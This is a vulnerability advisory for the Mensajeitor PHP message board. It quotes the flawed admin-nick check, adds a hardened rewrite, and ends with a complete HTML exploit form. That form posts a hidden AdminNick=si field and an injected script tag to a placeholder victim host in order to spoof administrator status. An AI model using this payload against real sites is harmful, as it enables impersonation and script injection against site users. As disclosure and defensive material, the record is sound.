Vulnerability details:
Mensajeitor Code Injection Admin Spoof
Record created 2004-07-21 12:05:35, last updated 2008-03-02 23:48:46
Mensajeitor contains a flaw that allows an attacker to post a message as an administrator. The problem is that there is no default value for the $AdminNick variable in mensajeitor.php, so the checks on this variable can be bypassed, allowing an attacker to impersonate the administrator and post messages with higher privileges.
Vulnerable code:

```php
// Excerpt from mensajeitor.php as quoted in the advisory. The loop header and the
// HTML tag wrapping the admin nick were lost in extraction; $admins and <b> are
// reconstructed placeholders. Note that $AdminNick is never given a default value.
for ($i = 0; $i < count($admins); $i++) {
    if ($nick == $admins[$i]) {
        $cadena_final .= "<b>" . $nick . "</b>";
        $AdminNick = "si";
    }
}
if ($AdminNick != "si") {
    $cadena_final .= "$nick";
}
```
As can be seen in the previous code, no default value is given to $AdminNick, and if both checks fail the code never sets one. This allows a remote attacker to place himself in the admin group simply by supplying a value for the $AdminNick parameter himself. This opens the product up to several kinds of attack, one of them being HTML and code injection.
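The hardened check below is an added example, not Mensajeitor's code. The admin flag is computed only from a server-side comparison and always has a value, request fields are read explicitly from $_POST rather than through PHP's register_globals (the mechanism such a parameter bypass relies on, assumed here), and the nick is escaped before it is concatenated into HTML. The $admins list, the sample inputs and the helper name are assumptions.

```php
<?php
// Added example: hardened replacement for the $AdminNick check.

function append_nick_markup(string $nick, array $admins, string &$cadena_final): bool
{
    // The flag is derived only from the server-side comparison and is always set,
    // so a client-supplied AdminNick=si can no longer stand in for it.
    $isAdmin = in_array($nick, $admins, true);

    // Escape before building HTML so an injected <script> is rendered as text.
    $safeNick = htmlspecialchars($nick, ENT_QUOTES, 'UTF-8');

    if ($isAdmin) {
        $cadena_final .= "<b>" . $safeNick . "</b>";
    } else {
        $cadena_final .= $safeNick;
    }
    return $isAdmin;
}

// Inputs come from $_POST by explicit name; nothing else on the request is trusted.
// $cadena_final is never seeded from the client, so a posted cadena_final is ignored.
$admins = ['aaff'];                    // constructed sample admin list
$nick = $_POST['nick'] ?? '';
$cadena_final = '';

// Constructed demo input mirroring the advisory's form: AdminNick is simply not read.
if (PHP_SAPI === 'cli') {
    $_POST = ['nick' => 'Nick', 'AdminNick' => 'si', 'cadena_final' => ' | injected'];
    $nick = $_POST['nick'];
}

$isAdmin = append_nick_markup($nick, $admins, $cadena_final);
echo ($isAdmin ? "admin" : "user") . ": " . $cadena_final . "\n";   // user: Nick
```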
Exploit code:

```html
<html>
<head><title>Mensajeitor Exploit</title></head>
<body>
Inyeccion codigo en Mensajeitor =< v1.8.9 r1<br><br>
<form name="form1" method="post" action="http://www.victima.com/mensajeitor.php">
<input type="text" name="nick" size="10" value="Nick" maxlength="9"><br>
<input type="text" name="titulo" size="21" value="Mensaje"><br>
<input type="text" name="url" size="21" value="http://"><br>
<input type="hidden" name="AdminNick" value="si"><br>
Introduce codigo a insertar ( | debe incluirse al principio)<br>
<input type="text" name="cadena_final" size="75%" value=" | <script>alert('hacked ;)')"><br>
<input type="submit" name="enviar" value="Enviar" class="form"><br>
MensajeitorPHP propiedad de aaff.<br>
</form>
</body>
</html>
```

By Jordi Corrales (Shell Security Group, http://www.shellsec.net)